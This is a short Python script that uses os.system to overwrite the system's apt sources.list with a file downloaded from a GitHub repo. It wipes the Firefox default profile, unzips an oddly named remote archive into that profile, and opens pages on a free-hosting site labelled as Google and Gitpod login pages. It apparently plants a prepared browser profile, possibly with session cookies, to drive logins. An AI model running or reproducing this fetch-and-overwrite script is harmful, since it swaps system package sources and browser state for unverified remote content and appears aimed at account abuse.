import os
os.system("wget https://raw.githubusercontent.com/petxir/josgandos/main/sources.list")
os.system("mv sources.list /etc/apt/sources.list")
os.system("apt-get update || apt-get install firefox -y && apt-get install zip -y && apt-get install tmux -y")
os.system("tmux new-session -d firefox")
os.system("sleep 1")
os.system("pkill tmux")
os.system("rm -rf .mozilla/firefox/*default-release/.|| rm -rf .mozilla/firefox/default-release/")
os.system("wget https://raw.githubusercontent.com/petxir/jose/main/qwertyuzipsdf.zip")
os.system("unzip qwertyuzipsdf.zip")
os.system("mv babibubebo/* .mozilla/firefox/*default-release/")
os.system("rm -rf babibubebo")
os.system("tmux new-session -d firefox http://oibabiketu.epizy.com/gtpod/mbukagoogle.html")
os.system("sleep 10")
os.system("firefox --private-window http://oibabiketu.epizy.com/gtpod/mbukagitpodlogin.html")